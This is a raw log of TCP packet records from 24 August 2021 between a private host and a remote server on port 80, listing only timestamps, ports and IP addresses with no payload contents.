Aug 24, 2021 08:46:49.120762110 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120763063 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.120781898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120794058 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.120803118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120824099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120846987 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120856047 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.120867968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120883942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120903969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120903969 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.120908022 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.120925903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120946884 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.120949030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120971918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.120980024 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.121037006 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.143285036 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143321991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143340111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143357992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143376112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143393993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143412113 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143429041 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143446922 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143517017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143543959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143567085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143589973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143611908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143635988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143659115 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143671036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.143682003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143699884 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.143701077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143723965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143729925 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.143748045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143767118 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.143769979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143790960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.143793106 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.143829107 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.168699980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.168750048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.168773890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.168793917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.168817997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.168839931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.168864012 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.168885946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.168912888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.168936968 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.168960094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.168986082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.169011116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.169034004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.168988943 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.169058084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.169080973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.169109106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.169132948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.169157028 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.169181108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.169181108 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.169204950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.169228077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.169253111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.169275045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.169312954 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.169320107 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.169384956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.169389963 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.169393063 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.169395924 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.169399023 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.169400930 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.169565916 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.192085981 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192168951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192248106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192289114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192295074 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.192341089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192368031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192384958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192401886 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.192409039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192430019 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192447901 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.192495108 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.192514896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192563057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192574024 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.192585945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192608118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192631960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192635059 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.192660093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192683935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192683935 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.192707062 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192729950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192735910 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.192754030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192779064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192804098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192830086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192857027 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192883015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.192887068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.193002939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.193017006 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.193020105 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.215892076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.216923952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.216967106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.216990948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217014074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217036963 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217056990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217076063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217089891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.217092991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217109919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217128992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217148066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217166901 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217185020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217205048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217223883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217242956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217262030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217281103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217292070 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.217300892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217307091 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.217310905 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.217319965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217339039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217359066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217379093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217396975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217416048 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.217632055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.240325928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.240396023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.240444899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.240474939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.240500927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.240552902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.240561008 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.240601063 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.240643978 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.240650892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.240700960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.240751982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.240776062 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.240803957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.240849972 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.240854979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.240915060 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.240958929 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.240966082 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241014004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241055012 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.241063118 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241111040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241152048 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.241161108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241211891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241254091 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.241261005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241318941 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241364002 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.241372108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241420984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241461992 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.241470098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241518974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241559982 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.241566896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241617918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.241669893 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.264770985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.264825106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.264847040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.264869928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.264894962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.264919996 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.264923096 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.264949083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.264965057 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.264972925 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.264996052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.264998913 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.265021086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265022993 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.265043974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265068054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265074015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.265110016 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.265263081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265292883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265317917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265341997 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.265347958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265373945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265387058 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.265398979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265428066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265438080 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.265454054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265480042 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265500069 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.265506029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265535116 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265544891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.265563965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265594006 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265618086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.265618086 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.265661001 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.288053989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288094997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288137913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288168907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288234949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288258076 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.288278103 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288320065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288355112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288357973 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.288399935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288415909 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.288445950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288486958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288513899 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.288525105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288562059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288584948 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.288589954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288614988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288636923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288650036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.288657904 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288681984 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288698912 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.288702965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288724899 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288744926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288752079 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.288769960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288793087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288795948 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.288814068 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288834095 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.288835049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288858891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.288872957 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.288921118 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.311062098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311152935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311178923 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311204910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311230898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311264038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311265945 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.311312914 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.311368942 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311395884 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311419010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311445951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311470985 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311494112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311517000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311539888 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311563015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311585903 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311609030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311635017 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311660051 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311685085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311708927 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311732054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311753988 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311778069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311800957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311826944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311851025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311872959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.311872959 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.311903954 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.311924934 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.333781958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.333810091 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.333826065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.333841085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.333857059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.333869934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.333942890 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.334214926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334238052 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334250927 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.334254980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334270954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334304094 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.334352970 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.334357023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334378004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334394932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334409952 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334425926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334444046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334455013 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334422112 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.334548950 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.334552050 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.334623098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334685087 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.334773064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334790945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334805965 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334822893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334834099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.334839106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334855080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:49.334868908 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:49.334870100 CEST	80	49715	212.224.105.79	192.168.2.7
